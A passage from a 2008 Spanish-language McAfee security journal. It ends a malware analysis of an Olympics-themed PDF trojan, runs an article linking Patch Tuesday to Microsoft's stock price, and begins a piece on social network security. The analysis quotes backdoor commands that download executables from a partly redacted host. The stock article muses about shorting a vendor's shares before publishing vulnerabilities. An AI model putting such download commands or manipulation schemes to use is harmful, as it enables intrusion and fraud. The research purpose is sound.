las tres secuencias de comandos del lado servidor, loginv2.asp, votev2.asp, y logoutv2.asp, informan al agresor de que dispone de una nueva mquina infectada, comprueban si el agresor ha enviado un comando y cierran la puerta trasera, respectivamente. Para leer la respuesta enviada tras conectarse a una de las secuencias de comandos del lado servidor, el troyano crea una copia de la pgina Web devuelta en la siguiente carpeta: C:\Archivos de programa\InstallShield Installation Information\ el nombre de archivo consta de un valor aleatorio de seis dgitos; una vez ledo, el archivo se borra. loginv2.asp y logoutv2.asp slo devuelven pginas Web vacas (con etiquetas <html><head> </head></html>), pero votev2.asp devuelve cdigo que ms o menos significa la puerta trasera est lista pero de momento no hace falta ninguna accin (@n4@300@) o un comando como el siguiente:

Esta tendencia del malware puede extenderse en los prximos meses, lo cual es motivo de seria preocupacin, porque la mayora de la gente confa en los proveedores de seguridad. Si se pierde esta confianza, probablemente sufrirn todava muchos usuarios ms.

software y sitios no autorizados

las interceptaciones imaginativas en ataques de ingeniera social no se limitan a acontecimientos deportivos. Durante varios meses hemos percibido un incremento del software malicioso que se presenta en forma de aplicaciones de proveedores de seguridad. aparentando ser de ayuda, estos programas logran que las vctimas infecten su propio sistema. algunas variantes del troyano Fakealert7 advierten a sus vctimas de que su equipo est infectado (no les encanta la irona?) y proporcionan informacin (a menudo Url maliciosas) para que se descarguen herramientas antispyware, que en realidad son tambin aplicaciones no autorizadas. Dada la importancia de mantener el software actualizado, no han tardado mucho en aparecer sitios Web de actualizaciones no autorizados imitando el sitio autntico de Windows Update. recientemente hemos descubierto un sofisticado mtodo que utilizaba componentes Dll vinculados a un sitio Windows Update falso e impeda que Internet explorer alertara a los usuarios cuando un servidor Web remoto empleaba un certificado no vlido para un sitio Web seguro (HTTPs). el objetivo de este ataque era disfrazar los archivos maliciosos de verdaderas actualizaciones de Windows para que las vctimas las descargaran y ejecutaran. esta tendencia del malware puede extenderse en los prximos meses, lo cual es motivo de seria preocupacin, porque la mayora de la gente confa en los proveedores de seguridad. si se pierde esta confianza, probablemente sufrirn todava muchos usuarios ms.

@n11@http://www1.palms[eliminado]/ld/v2/sy64. jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d 302f7a58aeb1@ @n11@http://www1.palms[eliminado]/ld/v2/200764.jpg @% SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f fd48c@.

aproximadamente, estos comandos quieren decir Descargar el archivo de extensin .JPg mencionado e introducirlo en la carpeta %SysDir% del sistema de la vctima utilizando el nombre indicado del archivo ejecutable. la ltima parte de la respuesta es el hash md5 del archivo que va a descargarse (y que servir para comprobar su integridad). Durante todo este proceso, las vctimas no tienen ni idea de lo que est ocurriendo en segundo plano. Mientras leen y rellenan la declaracin que ha presentado el archivo PDF malicioso, en su sistema se instala silenciosamente una puerta trasera a la espera de los comandos del atacante. en ese momento, en el equipo tambin pueden descargarse otros archivos maliciosos, ya que su seguridad se ha quebrantado por completo.

20

McaFee secUrITy JoUrnal

conclusin
los acontecimientos deportivos se utilizan con frecuencia como cebo en ataques de ingeniera social. era fcil suponer que los desarrolladores de malware dirigiran su atencin a los Juegos olmpicos de Pekn. el acto contena todos los ingredientes para una receta perfecta: pequeos ataques escogidos que crecan en alcance a medida que se elevaba el nmero de vctimas interesadas en el tema. este crecimiento fue posible gracias a la estrecha relacin de varios temas entre s: la preocupacin por el Tbet dio paso al relevo de la antorcha, que a su vez desemboc en los propios Juegos olmpicos. a menudo los medios de comunicacin desempean un papel importante en la popularidad de un acontecimiento. su trabajo induce a algunas vctimas a buscar ms informacin, pero stas tropiezan muchas veces con sitios Web relacionados pero maliciosos o, ms habitualmente, con sitios Web legtimos que ya no son seguros y que infectan con sigilo a sus confiados visitantes. estos ataques son tan elaborados que lo ms probable es que las vctimas no sospechen nada. como hemos visto en este estudio, no slo nos enfrentamos a amenazas de remitentes desconocidos y datos con extensin .exe adjuntos al correo electrnico. Tambin los documentos legtimos (Microsoft Word, Microsoft excel, Microsoft PowerPoint y otros) pueden ser malintencionados. en parte, estos ataques tienen tanto xito por la ingenua creencia de que los archivos de datos no pueden contener malware. al final, la gente acaba por conocer los trucos habituales, lo que a su vez obliga a los agresores a ser ms creativos y malvados en sus tcnicas para, as, seguir venciendo a sus vctimas.

Elodie Grandjean trabaja como investigadora de virus para Mcafee avert labs en Francia desde enero de 2005. Posee ms de cinco aos de experiencia en ingeniera inversa con plataformas Windows. elodie se ha especializado en tcnicas de anti-ingeniera inversa, desempaquetado y descifrado, y ha escrito para la revista de seguridad francesa MISC: MultiSystem & Internet Security Cookbook. si no est analizando malware o programando, seguramente elodie est navegando por Internet, a menos que asista a un concierto o disfrute de una cerveza belga en un bar con sus amigos.

NOTAS
1 Fribet, Mcafee VIl. http://vil.nai.com/vil/content/v_144356.htm 2 Is Malware Writing the next olympic event? (est el malware escribiendo el prximo acontecimiento olmpico) Mcafee avert labs Blog. http://www.avertlabs.com/research/blog/index.php/2008/04/14/ is-malware-writing-the-next-olympic-event/ 3 BackDoor-DoW, Mcafee VIl. http://vil.nai.com/vil/content/v_144476.htm 4 services, Microsoft Developer network. http://msdn.microsoft.com/en-us/library/ms685141(Vs.85).aspx 5 registry, Microsoft Developer network. http://msdn.microsoft.com/en-us/library/ms724871(Vs.85).aspx 6 Descripcin de svchost.exe en Windows XP Professional edition, Microsoft ayuda y soporte. http://support.microsoft.com/kb/314056/es 7 Fakealert-B, Mcafee VIl. http://vil.nai.com/vil/content/v_139058.htm Fakealert-c. http://vil.nai.com/vil/content/v_139219.htm Fakealert-D. http://vil.nai.com/vil/content/v_140346.htm Fakealert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm Fakealert-H. http://vil.nai.com/vil/content/v_141377.htm Fakealert-I. http://vil.nai.com/vil/content/v_141466.htm Fakealert-g. http://vil.nai.com/vil/content/v_141163.htm Fakealert-M. http://vil.nai.com/vil/content/v_142807.htm Fakealert-Q. http://vil.nai.com/vil/content/v_143088.htm Fakealert-r. http://vil.nai.com/vil/content/v_143102.htm Fakealert-s.dll. http://vil.nai.com/vil/content/v_143110.htm Fakealert-T. http://vil.nai.com/vil/content/v_143406.htm generic Fakealert.a. http://vil.nai.com/vil/content/v_143470.htm

oToo 2008

21

Vulnerabilidades en los mercados de valores

Anthony Bettini

la reciente confusin crediticia en los mercados de valores y derivados ha puesto de relieve numerosas facetas de la industria financiera que no se limitan a las estructuras de control reglamentarias, agencias de calificacin crediticia, fondos de inversin libre, inversiones en capital riesgo, fondos de pensiones y otros creadores de mercado.
esta atencin continua por parte de los medios de comunicacin ha hecho crecer el inters por la ingeniera financiera de las personas que trabajan en ciencias relacionadas (como bioinformtica, informtica, etc.). con nuestro historial en investigacin de vulnerabilidades y dado el contexto de repercusin en los medios de comunicacin de la crisis crediticia, es natural buscar vulnerabilidades en el mercado de valores y derivados. en la conferencia sobre seguridad Black Hat 2007 que se celebra en estados Unidos, la firma de investigacin y desarrollo de seguridad Matasano security examinaba el protocolo de intercambio de informacin financiera (Financial Information eXchange, FIX), que es el pilar para la transmisin de mensajes entre los directores de inversin encargados de numerosas operaciones en nombre de clientes e intermediarios financieros y agentes de bolsa1,2. en la investigacin de Matasano se planteaban cuestiones como Qu vulnerabilidades pueden encontrarse en el protocolo FIX?. sin duda fue un interesante anlisis de los protocolos financieros desde la perspectiva de los puntos dbiles de la seguridad. sin embargo, nuestro artculo ofrecer otro enfoque: a nosotros ms que el aspecto de las vulnerabilidades nos preocupa la ingeniera financiera y social. nuestra investigacin comienza con las siguientes preguntas:

Qu pasa con las amenazas de tipo zero-day? Tienen siquiera constancia de estos eventos los inversores? se producen en la actualidad eventos de ingeniera social relacionados con las vulnerabilidades y las acciones? Podramos asistir un aumento de este tipo de eventos en el futuro?

este es un tema de estudio muy amplio, as que comenzaremos por analizar solamente las vulnerabilidades de los productos de Microsoft. en el futuro cercano, esperamos aportar datos complementarios sobre otros desarrolladores de software, as como una comparativa del aspecto financiero de los mtodos de distribucin de parches (por ejemplo, la distribucin mensual de Microsoft o la trimestral de oracle, comparadas con la distribucin no planificada de otros proveedores, que se ajusta segn las necesidades de cada momento).

la hiptesis
el Martes de parches es el segundo martes de cada mes. es el nico da del mes que Microsoft distribuye sobre todo actualizaciones de seguridad y funcionales para Windows y el resto de sus aplicaciones. nuestra hiptesis es que los Martes de parches hay una tendencia a la baja del precio de las acciones de Microsoft (smbolo de cotizacin: MsFT). esta presin se debe probablemente a las reacciones ante los artculos que aparecen sobre las implicaciones negativas de las vulnerabilidades de seguridad en el software de Microsoft. De manera anloga, al da siguiente, mircoles, es de esperar que se produzca una recuperacin, una vez que los inversores se percaten de que los valores de Microsoft se sobrevendieron el da anterior.

Qu efectos tiene en las cotizaciones burstiles el Martes de parches de Microsoft? y el da anterior al Martes de parches? y el da despus (denominado en ocasiones "Mircoles de ataques")? y los Jueves de notificaciones avanzadas?

22

McaFee secUrITy JoUrnal

Hay quien que gana dinero los Martes de parches?

Parece ser que es as. al menos parece evidente la relacin entre las fluctuaciones del precio por accin de Microsoft y el ciclo de distribucin de los Martes de parches. Por ejemplo, examinemos la Figura 1. la primera fila Media anual es la media base entre el precio por accin de Microsoft al inicio de la jornada y la cotizacin al cierre. se incluye como alternativa base los Das sin eventos, que excluyen eventos como las notificaciones avanzadas y el Martes de parches. Por regla general, parece que cuando Microsoft publica una notificacin avanzada la cotizacin sufre una presin a la baja ms fuerte de lo habitual. Del mismo modo, est presin a la baja tambin se observa los Martes de parches. y lo que es an ms interesante es que los llamados Mircoles de ataques (da despus del Martes de parches), como media, el valor experimenta una recuperacin o un cierre neto positivo. esto probablemente se deba a que los inversores institucionales
El precio de las acciones de Microsoft cambia desde la apertura al cierre de la jornada burstil.
VARIACIN DE MSFT DE APERTURA A CIERRE 2008 2007 2006

o los creadores de mercado consideran que el da anterior la venta de acciones de Microsoft como consecuencia de las malas noticias fue excesiva y que, en realidad, el valor real de Microsoft como inversin slo se vio afectado mnimamente. es de destacar que esta tendencia ha sido constante durante los ltimos tres aos y contina en la actualidad. aunque posiblemente sea ms fcil entender la variacin del precio de la apertura al cierre, tambin pueden apreciarse las tendencias en la diferencia media entre el precio inicial y el precio mximo (cotizacin del da) y en la diferencia media entre el precio inicial y el precio mnimo, aunque, en algunos casos, este efecto no es tan acusado. en la Figura 2 observamos que generalmente el valor mximo intrada medio en un da de notificacin avanzada y un Martes de parches es inferior al valor mximo intrada medio del ao. Tambin observamos que el valor mximo intrada medio del da siguiente al Martes de parches suele ser superior, lo que indica mayores presiones al alza.

Valor mnimo intrada de Microsoft a la apertura

VARIACIN DE MSFT DE APERTURA A MN

2008

2007

2006

Media anual Das sin eventos Notificacin avanzada Martes de parches Todos los martes Martes, excepto los de parches Da despus del Martes de parches Todos los mircoles Mircoles, excepto el da despus del Martes de parches

-0,17% -0,20% -0,43% -0,45% 0,16% 0,37% 0,49% -0,18% -0,40%

0,06% 0,07% -0,12% -0,29% 0,05% 0,15% 0,21% 0,44% 0,51%

0,08% 0,08% -0,08% -0,11% -0,03% -0,01% 0,27% 0,29% 0,26%

Media anual Das sin eventos Notificacin avanzada Martes de parches Todos los martes Martes, excepto los de parches Da despus del Martes de parches Todos los mircoles Mircoles, excepto el da despus del Martes de parches

-1,35% -1,39% -1,24% -1,58% -1,16% -1,01% -0,91% -1,39% -1,56%

-0,89% -0,90% -1,24% -0,99% -0,81% -0,76% -0,74% -0,78% -0,79%

-0,64% -0,64% -0,36% -0,93% -0,74% -0,68% -0,47% -0,51% -0,54%

Figura 1: Si se analiza el cambio de las cotizaciones de Microsoft en das clave, se observar una tendencia constante durante tres aos. Valor mximo intrada de Microsoft a la apertura
VARIACIN DE MSFT DE APERTURA A MX

Figura 3: El Martes de parches conserva su posicin "baja" cuando se compara con el mnimo medio intrada del ao.

2008

2007

2006

Media anual Das sin eventos Notificacin avanzada Martes de parches Todos los martes Martes, excepto los de parches Da despus del Martes de parches Todos los mircoles Mircoles, excepto el da despus del Martes de parches

1,28% 1,34% 0,93% 0,92% 1,35% 1,50% 1,52% 1,25% 1,17%

0,97% 0,95% 1,08% 0,98% 1,01% 1,02% 1,30% 1,24% 1,23%

0,88% 0,88% 0,58% 0,67% 0,92% 0,99% 0,70% 0,92% 0,95%

Figura 2: En la contratacin intrada en los das de Notificacin avanzada y los Martes de parches la cotizacin es siempre inferior a la de los dems das del ao. oToo 2008 23

en la Figura 3 observamos que generalmente el valor mnimo intrada medio de un Martes de parches es inferior al valor mnimo intrada medio del ao. sin embargo, los das de notificacin avanzada, los resultados no estn tan claros. es tambin relevante que el valor mnimo intrada medio del da siguiente a un Martes de parches suele ser superior a la media del ao, lo que indica mayores presiones al alza. como advertencia para el inversor ocasional o para el inversor privado: estas fluctuaciones de precio son relativamente pequeas y con estrechas limitaciones de tiempo. Para obtener beneficios a nivel privado en este tipo de operaciones sera necesario arriesgar mucho capital. otra advertencia: los datos representados son reducidos y, por lo tanto, su calidad es relativamente limitada. Por ejemplo, slo hay 260 das de mercado al ao, de lo cuales slo 12 caen en Martes de parches. aunque los grupos de datos y las fluctuaciones son pequeas, es posible que este nivel de correlacin slo sea interesante para los inversores institucionales y debe adaptarse convenientemente. ahora vamos a examinar una comparativa de los mrgenes de ganancias potenciales (Figura 4). segn muestra la Figura 4, si se compra cerca del mnimo intrada medio en un Martes de parches y se vende cerca del mximo intrada medio del da siguiente, se pueden conseguir pequeas ganancias (hasta que esta operacin se generaliza, lo que produce un amortiguamiento del efecto). el margen de ganancias que se muestra se centra en la divulgacin de vulnerabilidades reales que se producen basndose en la presuncin de que otras personas actuarn de una forma previsible. sin embargo, al igual que los rumores de oPa hostil afectan al precio de las acciones, tambin podran

hacerlo los rumores de que existen algunos defectos crticos que ponen en riesgo a los consumidores. no perdamos de vista que la divulgacin de vulnerabilidades falsas y los rumores ya son habituales en las listas de correo actuales, como Full Disclosure o en salas de chat Irc. es posible que mediante la ingeniera social los eventos se pudieran orquestar con el fin de manipular el mercado y a sus participantes. esto sin duda sera ilegal; pero cuando se trata de obtener ganancias, siempre hay alguien dispuesto a saltarse la ley. adems, como veremos ms adelante, no todos los ataques emplean la ingeniera social. algunos pueden incluso ser legales. este tipo de situaciones, es decir, la posibilidad de predecir la tendencia del mercado a corto plazo para obtener ganancias, al menos segn la hiptesis de los mercados eficientes (eMH, efficient Market Hypothesis) y la hiptesis del paseo aleatorio (random Walk Hypothesis), son poco probables y desde luego, si se producen, es poco probable que perduren en el tiempo3,4. Por lo tanto, avisamos a los lectores, como pensamos que deberan hacer todas las entidades financieras: rentabilidades pasadas no necesariamente garantizan rentabilidades futuras5.

Uso del volumen de negociacin como indicador

otra de nuestras teoras era que el ciclo de Martes de parches haba amortiguado el efecto de la mala prensa observada durante los das de distribucin no planificada de boletines de seguridad (antes de mediados de octubre de 2003). Una rpida mirada al volumen de negociacin corroborara esta teora. (Vase la Figura 5, en la pgina siguiente.)

Mrgenes de ganancias potenciales

MRGENES

2008

2007

2006

Mnimo intrada Ao completo (mnimo intrada) respecto a ao completo (mximo intrada) Martes de parches (mnimo intrada) respecto a Martes de parches (mximo intrada) Martes de parches (mnimo intrada) respecto al da despus del Martes de parches (mximo intrada) -1,35% -1,58% -1,58%

Mximo intrada 1,28% 0,92% 1,52%

Mnimo intrada -0,89% -0,99% -0,99%

Mximo intrada 0,97% 0,98% 1,30%

Mnimo intrada -0,64% -0,93% -0,93%

Mximo intrada 0,88% 0,67% 0,70%

Figura 4: Puede parecer que con la adquisicin de acciones un Martes de parches y la posterior venta al da siguiente se pueden obtener ganancias legtimas, pero esto slo es cierto cuando se negocian grandes volmenes y el nivel de riesgo es considerable.

24

McaFee secUrITy JoUrnal

Volmenes de Microsoft, 2002 03

DIFERENCIALES DE VOLUMEN DE MSFT (SIN PLANIFICAR) 2003 2002

Volumen medio, ao completo (en acciones negociadas al da) Volumen medio, ao completo (sin eventos) Volumen medio, da de boletines no planificados Diferencia media en volumen Diferencia media en volumen respecto a das sin eventos

65.074.644 64.512.432 70.017.743 7,60% 8,53%

76.903.678 76.503.325 78.796.255 2,46% 3,00%

Figura 5: Volumen de contratacin de las acciones de Microsoft antes de pasar de los boletines no planificados a los Martes de parches.

Publicaciones el Martes de parches

DIFERENCIALES DE VOLUMEN DE MSFT (CON PLANIFICACIN)

2008

2007

2006

2005

2004

Volumen medio, ao completo Volumen medio, ao completo (sin eventos) Volumen medio, Martes de parches Volumen medio de los martes, excepto los de parches Diferencia media de volumen de MSFT (Martes de parches comparado con ao completo) Diferencia media de volumen de MSFT (Martes de parches comparado con das sin eventos) Volumen de ^IXIC medio, ao completo Volumen de ^IXIC medio, ao completo (sin eventos)

84.898.274 86.738.696 75.584.620 79.818.571 -10,97% -12,86%

62.506.437 64.210.868 57.840.233 59.305.574 -7,47% -9,92%

67.074.387 68.753.419 63.786.108 64.967.877 -4,90% -7,22%

66.612.503 67.227.483 65.453.142 69.691.473 -1,74% -2,64%

66.793.733 67.260.018 65.439.875 66.471.610 -2,03% -2,71%

2.249.267.340 2.089.534.502 1.926.859.522 1.731.835.794 1.769.480.040 2.271.900.270 2.094.466.552 1.935.854.692 1.732.949.769 1.768.463.981

Volumen de ^IXIC medio en Martes de parches 2.161.318.000 2.054.922.500 2.009.946.667 1.745.967.500 1.759.816.667 Volumen de ^IXIC medio de los martes, excepto los de parches Diferencia media de volumen de ^IXIC (Martes de parches comparado con ao completo) Diferencia media de volumen de ^IXIC (Martes de parches comparado con das sin eventos) Diferencia en MSFT entre Martes de parches y martes sin parches Diferencia en ^IXIC entre Martes de parches y martes sin parches 2.249.947.143 2.107.280.909 1.813.831.818 1.658.301.818 1.752.408.182 -3,91% -4,87% -5,30% -3,94% -1,66% -1,89% -2,47% -2,48% 4,31% 3,83% -1,82% 10,81% 0,82% 0,75% -6,08% 5,29% -0,55% -0,49% -1,55% 0,42%

Figura 6: La institucin del Martes de parches parece haber convencido a los operadores burstiles de que no se pueden obtener ventajas exclusivamente de los eventos ocurridos en dicho da.

oToo 2008

25

en la Figura 5 (pgina 25) observamos que el da de la publicacin no planificada de un boletn en 2003 y 2002, el volumen medio de negociacin super el volumen medio del ao, un 7,6 por ciento y un 2,46 por ciento de media, respectivamente. si comparamos solamente los das en los que no hay ningn evento especial para obtener el volumen medio del ao completo, esta cifra se eleva hasta el 8,53 por ciento y el 3 por ciento, respectivamente. esto contrasta bastante con los diferenciales de volumen de los Martes de parches, que se muestran en la Figura 6 (pgina 25). Hemos incluido tambin una comparativa entre Microsoft (MsFT) y el ndice compuesto nasDaQ (^IXIc). esto implicara que el efecto de cambiar de boletines no planificados (paseo aleatorio) a planificados (Martes de parches) entre los operadores ha sido una disminucin del inters por los eventos asociados al Martes de parches. a continuacin, examinaremos los datos comparativos en el caso de las notificaciones avanzadas (vase la Figura 7, a continuacin). Por qu es el volumen medio inferior el Martes de parches y el da de notificacin avanzada? nuestra hiptesis es que el volumen medio anual comparado con el volumen medio del Martes de parches puede explicarse debido a eventos significativos que afectan al ao completo (de la martingala en la teora de la probabilidad) que estadsticamente tienen menos probabilidades de producirse un Martes de parches debido a que son menos frecuentes (slo 12 veces al ao)6.

Es posible que ya haya quien utiliza las amenazas de tipo zero-day (da cero) para un beneficio econmico, no slo para incluir troyanos que roben contraseas, sino para adoptar posiciones cortas o de opciones sobre acciones y derivados.

notas de prensa, reacciones e implicaciones

las implicaciones de estos factores pensamos que son interesantes y esperamos que este artculo estimule nuevas investigaciones sobre la influencia de las vulnerabilidades y las amenazas en los mercados de valores. Por ejemplo, pensemos en el bulo de emulex7. en este caso, alguien public una nota de prensa falsa acerca del cese del Director ejecutivo, que provoc una cada del 62 por ciento en la contratacin intrada de acciones de emulex. la persona responsable haba vendido al descubierto una gran cantidad de acciones de la empresa y sus ganancias ascendieron a ms de 250.000 dlares. se trat de caso claro de fraude. Del mismo modo, se destapan de vez en cuando casos de contratacin en bolsa con informacin privilegiada (que obviamente tambin es ilegal).

Notificacin avanzada

DIFERENCIALES DE VOLUMEN DE MSFT (NOTIFICACIN AVANZADA)

2008

2007

2006

Volumen medio, ao completo Volumen medio, ao completo (sin eventos) Volumen medio, da de Notificacin avanzada Diferencia media en volumen Diferencia media en volumen respecto a das sin eventos Volumen de ^IXIC medio, ao completo Volumen de ^IXIC medio, ao completo (sin eventos) Volumen de ^IXIC medio, Notificacin avanzada

84.898.274 86.738.696 82.848.700 -2,41% -4,48%

62.506.437 64.210.868 61.532.042 -1,56% -4,17%

67.074.387 68.753.419 54.484.850 -18,77% -20,75%

2.249.267.340 2.089.534.502 1.926.859.522 2.271.900.270 2.094.466.552 1.935.854.692 2.221.380.000 2.224.365.833 1.872.442.500

Figura 7: Como media, el volumen de negociacin de los valores de Microsoft es menor en los Martes de parches y los das de Notificacin avanzada.

26

McaFee secUrITy JoUrnal

sin embargo, si las fluctuaciones del precio de las acciones se deben a los anuncios de vulnerabilidades y parches, qu ocurrira si una persona adoptara una posicin corta (descubierto) en una empresa de software importante y publicara unas cuantas vulnerabilidades con ataques en la lista de correo de Full Disclosure? Quizs, algo similar a lo conocido como el "Mes de los errores de navegador", pero dirigido a un proveedor, en un solo da? si esto ocurriera en horario de contratacin y durante uno de los das con menor probabilidad de que otras noticias distrajeran a los inversores (como los martes o jueves), las presiones a la baja en el mercado de valores seran significativas a nivel de particulares. adems sera manifiestamente ilegal si las vulnerabilidades no fueran ciertas (libelo o fraude). sin embargo, sera ilegal si fueran ciertas? no est tan claro que decir la verdad, aunque sea de forma potencialmente manipuladora, pueda considerarse ingeniera social, ni siquiera que sea ilegal. es posible que pudieran defenderse ambas posturas, pero consideremos la controversia entre Firestone y Ford por reventones de neumticos8. si en ese momento hubiera tenido un coche Ford, hubiera sufrido problemas de neumticos y hubiera adoptado una posicin corta con respecto al valor, podra haberse considerado un acto ilegal? sin duda. si hubiera vendido al descubierto y se lo hubiera comunicado a Firestone, Ford u otros, sera eso legal? como ocurre con cualquier otro vector de ataque o vulnerabilidad, estar al tanto y divulgar la informacin con frecuencia mejoran la situacin de seguridad de los que pueden resolver el problema. si hablamos con franqueza de los puntos dbiles, quizs podamos mejorar y supervisar el sistema de forma adecuada. es posible que ya haya quien utiliza las amenazas de tipo zero-day (da cero) para obtener un beneficio econmico, no slo para incluir troyanos que roben contraseas, sino para adoptar posiciones cortas o de opciones sobre acciones y derivados. es evidente que los remitentes de spam han encontrado formas de aprovecharse de los mercados de valores: hemos recibido muchos mensajes de spam que ofrecen acciones de muy poco valor.
NOTAS
1 goldsmith, Dave y Jeremy rauch; Matasano security. Hacking capitalism (los piratas informticos se aprovechan del capitalismo), Black Hat Usa 2007. 2 de agosto de 2007. 2 Financial Information eXchange (Intercambio de informacin financiera), Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Financial_Information_eXchange 3 random walk hypothesis (Teora del paseo aleatorio), Wikipedia. 15 de mayo de 2008. http://en.wikipedia.org/wiki/random_walk_hypothesis 4 efficient Market Hyp (Hiptesis de la eficiencia de los mercados), Wikipedia. 15 de mayo de 2008. http://en.wikipedia.org/wiki/efficient_market_hypothesis 5 Past performance not indicative of future results(rentabilidades pasadas no garantizan rentabilidades futuras), cBoe. 22.05.08. http://www.cboe.com/micro/vix/faq.aspx 6 Martingale (probability theory) (Martingala (teora de la probabilidad)), Wikipedia. 22 de mayo de 2008. http://en.wikipedia.org/wiki/Martingale_%28probability_theory%29 7 emulex Hoax (el bulo de emulex), Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/emulex_hoax 8 Firestone and Ford tire controversy (controversia por reventones de neumticos) Wikipedia. 20 de abril de 2008. http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy

conclusin
Todava queda mucho por hacer en el rea de las implicaciones de las vulnerabilidades y amenazas en los mercados de valores y derivados. nos hemos centrado principalmente en los mercados de valores. los mercados de derivados suelen moverse en la misma direccin, pero la volatilidad es mayor. siempre que exista un cierto nivel de confianza en la direccin de un movimiento, parece lgico que los operadores que publican las vulnerabilidades traten de ajustar el momento de publicacin a las fechas de expiracin de las opciones. Quiero dar las gracias a mis compaeros Craig Schmugar y Eugene Tsyrklevich por revisar este documento y los datos que incluye, as como por ofrecer sus puntos de vista. - A.B.

Anthony Bettini es miembro del equipo directivo de Mcafee avert labs. su especialidad es la deteccin de vulnerabilidades y la seguridad de Windows. Bettini ha sido ponente en la conferencia nacional sobre seguridad de sistemas Informticos del Instituto nacional de normas y Tecnologa (nIsT, en sus siglas en ingls) en el rea de Washington, D.c, sobre las tcnicas antiseguimiento, as como para numerosas empresas global 2000. Mientras trabaj en Foundstone, public nuevas vulnerabilidades descubiertas en Microsoft Windows, Iss scanner, PgP, symantec esM y otras aplicaciones de uso generalizado. Bettini fue editor tcnico de la edicin Hacking Exposed, 5th (Los piratas informticos se aprovechan) (Mcgraw-Hill).

OTRAS REfERENCIAS
cBoes archive of historic VIX data, using newer algorithm for the pre-

september 22, 2003 algorithm switch (archivo de datos histricos del ndice VIX, utilizando un algoritmo nuevo para el algoritmo previo del 22 de septiembre de 2003) 20 de abril de 2008. http://www.cboe.com/micro/vix/historical.aspx lo, andrew W. The adaptive Markets Hypothesis: Market efficiency from an evolutionary Perspective (la hiptesis de los mercados adaptables: eficacia de los mercados desde una perspectiva de evolucin). Journal of Portfolio Management. Indicadores financieros cortesa principalmente de yahoo Finance. 15 de mayo de 2008. http://finance.yahoo.com otros indicadores financieros cortesa de google Finance. 20 de abril de 2008. http://finance.google.com

oToo 2008

27

el futuro de los sitios de redes sociales

Craig Schmugar

en los ltimos aos, los nombres de los sitios de redes sociales Myspace, Facebook y otros han entrado a formar parte de la lengua de uso comn. aunque muchos creen que las redes sociales en Internet es un fenmeno relativamente nuevo,
en realidad, sitios como classmates.com y sixDegrees.com llevan funcionando ms de una dcada. sin embargo, lo cierto es que la explosin de crecimiento se ha producido en los ltimos aos. as que, qu es exactamente lo que convierte a un sitio en una red social? Bsicamente, los sitios de redes sociales son aquellos que estn formados por una comunidad online que permite a los usuarios compartir informacin, y hacer nuevos contactos o retomar las relaciones con los del pasado. la importancia de los sitios de redes sociales se basa en dos razones. en primer lugar, son el eptome de la Web 2.0, donde la red de usuarios es la plataforma y la comunidad es responsable del contenido. la plataforma crece gracias a las contribuciones de los usuarios, a travs de aplicaciones que estn a disposicin de la comunidad. en segundo lugar, los sitios de redes sociales combinan elementos de canales de comunicacin, como el correo electrnico, los paneles de mensajes, la mensajera instantnea y el chat, con vehculos de comunicacin, como el audio, el vdeo y las publicaciones. en estas comunidades, los individuos con ideas afines pueden compartir informacin e intereses comunes, as como aportar sus opiniones y puntos de vista. estos sitios pueden servir de plataformas de colaboracin y, a medida que crece la base de usuarios, aumenta el valor de toda la red. adems, estas plataformas permiten seleccionar la audiencia de la publicidad para ser ms directos y especializados que nunca; las empresas pueden centrar sus iniciativas de marketing en las personas que estn verdaderamente interesadas. los sitios de redes sociales contienen un almacn de informacin que se puede explorar y analizar con el fin de ampliar los perfiles de los usuarios y generar complejos diagramas y mapas de relaciones entre los usuarios, y entre los usuarios y sus intereses. la clave del xito de todo sitio de red social es contar con una base de usuarios slida y fiel. Friendster.com sabe bien de lo que estamos hablando. Friendster fue el precursor de Myspace y, en sus mejores momentos, el sitio de red social nmero uno indiscutible. entonces, qu fue lo que le ocurri? Friendster fue una especie de xito catastrfico. cuando la base de usuarios comenz a crecer de forma masiva y el contenido evolucion (incluyendo hasta juegos), el servidor central no pudo mantener el ritmo. los administradores del sitio se vieron obligados limitar el contenido que requera un gran ancho de banda, pero ni siquiera as consiguieron mejorar el rendimiento hasta niveles satisfactorios y la base de usuarios desert. adems, Friendster intent encajar la base de usuarios en su modelo predefinido de cmo deba utilizarse la red y quin deba participar. Myspace ofreca una plataforma ms robusta, no slo por su mayor ancho de banda, sino adems por el nivel de libertad del que disfrutaban los usuarios a la hora de crear, modificar y visualizar una variedad de contenidos ms amplia. en cuanto corri la voz entre los internautas de que Myspace era el nuevo Friendster, no pas mucho tiempo antes de que la mayora se cambiara de red. esta primera batalla entre redes sociales permite extraer algunas conclusiones, entre ellas, que la plataforma ha de ser flexible, ampliable y con capacidad de evolucin, y que la fidelizacin de sus usuarios es esencial. estos principios estn allanando el camino para los sitios de redes sociales del futuro.

Inseguridad social
Una parte del triunfo de Myspace sobre Friendster se debe al hecho de que permita a los usuarios un elevado nivel de personalizacin de sus perfiles. sin embargo, esto abri el camino para que los agresores insertaran cdigo maligno y lanzaran convincentes ataques de phising directamente desde sus perfiles de Myspace. Por desgracia, semejante nivel de flexibilidad se presta al aprovechamiento de vulnerabilidades, que los menos escrupulosos no dudan en utilizar. en la pugna por la cuota de mercado y siempre intentando evitar ser el siguiente Friendster, muchos sitios de redes sociales no han prestado a la seguridad toda la atencin que merece. como consecuencia, los sitios de redes sociales han sido blanco de

28

McaFee secUrITy JoUrnal

ataques de phising, gusanos, vulnerabilidades, recopilacin de datos, distribucin de publicidad no autorizada, difamacin y, por ltimo, aunque por eso no menos importante, de spam.

cul es la situacin actual?

